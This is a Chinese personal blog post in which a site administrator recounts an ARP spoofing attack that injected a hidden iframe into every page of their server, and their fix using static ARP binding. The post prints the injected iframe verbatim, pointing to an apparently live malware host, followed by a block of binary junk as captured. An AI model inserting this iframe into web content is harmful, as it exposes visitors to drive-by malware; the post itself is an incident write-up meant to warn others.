美好的夜晚，就在某人发来“晚安～”之后被ARP攻击毁掉了…
20:07:32，blue问我是不是对服务器进行操作了，页面显示不正常。
检查发现这样的状况：

<iframe src=http://f.ugt4d.cn/d1/13/index.htm width=100 height=0></iframe>‹������´VOo#5?©ßÁ5Rè2N²Ý²M2Alº‚ETlpª<cÏŒµ{°=¤ˆÏÃXqZq¡’+Hœ¸pCâÎ…Ï3ùÛ¦¥ZÁ2cûýý½÷~ÎhÿäãÉô‹ÓÇ(s¹D§Ÿ>zúd‚p‡ÏîO9™ž Ïߟ~øõ‚.šª¬pB+*    yüF8s®RUUPÝ´IÉô2ó¶z^yñÙqš
s÷Z£Úã,—ʆ;ìôŽõF˜SæßN8ÉÇ’ÂÆåÅ>z—åB    æ6oY4ÑÊ
yPÅåˆ4 •sG‘÷Ñá_–â<Ä^+יΎQܬBìøÌïsˆâŒË]˜FÏë�¤PÏQfx œ¦ÜêÝÇ‘:*ˆ­ÅÈpbëæ’ÛŒs‡‘õ�ñÆÈ2Q8$©JK0âè9}Voz¯”9°\&AA
Ä$†æÜ’«Ôeh?DÝ{諽Ö›2RÇÔ2—ùæÎp¯õõ^+)UìW)†Çî 4²1S    Åtµ’/$y-Ð(H°=2Ëõ__#IŽ*Á\â£n£HÆMˆá3æR”1¡Ò?lÖ¶ q½öç’ZhˆÒÚP¾3[>nðxäØÒÏÃ.,‰c›{½îÆæõÓþ•µâÌÂs]NèQ.ÒÌ
»Å¬ö<n«ÈÃZÚ²UˆBñˆ@Zj©k©ÍàÍž££a
×±â‚z‡Å¬YVyÀJ²!ÿüí«?üñë%@fÆ7zù— ®on¬S¼šÎ;}üŸîòŸh“#ÑL³ÚÂÔ(hôE­1¢uÆx1nA‘ï4£ιmÒB¥[ŒZ&ãjiÂ
†Ñ9•%|«~ÿ={~«xcv¥
æo“†Á8ƒà+jÖN|kìÄ“J‘BÆW¹|ùÍå߃,“gë>¥žô!ÿ´Îw
léÒµi^=jµY˜ò„ó.kƒ70f0Æ|æµ€}¨IÄðYDöêǍßXŽ;ù‚çû?×áoT@ù+í1i`ªëv¶Þõâþ¼;Œ»Guc«_;\&!Öı¯-£\¸õD¥sZ­
úÓïè»—ž·GÄC>¾³7X×ß    Û©    œÚƒ{ÏÞ)•×€ãžØÆ?Ü›žº
Ö×�>

P.S. 我之所以没有隐藏掉iframe里的src，完全是SEO需要，下一个中招的弟兄可以搜到这篇文章。我知道你年少轻狂，也别动去访问那一页的念头！

总之就是所有页面前面都被加了一个iframe，明显的ARP攻击症状。
搜索从来不删除邮件的Gmail，我发现上次ARP攻击之后，我们的真正网关的MAC被换过了…所以这也是我不想轻易执行arp -s绑定的原因：机房会换网关的，而一旦换了我们不知道，就回导致断网。
于是我只好不断执行arp命令查看当前的MAC，发现是错误的MAC，就执行以下命令清除ARP缓存：

[code=’sh’]arp -s 网关IP地址 网关真正的MAC地址[/code]

然而我悲壮地发现ARP缓存更新非常快，不到两分钟呢。我总不能一夜都手工干这个啊。于是我还是动了-s的念头。最终-s暂时躲过了这一劫，下面到了21点30分，例行宕机时间了…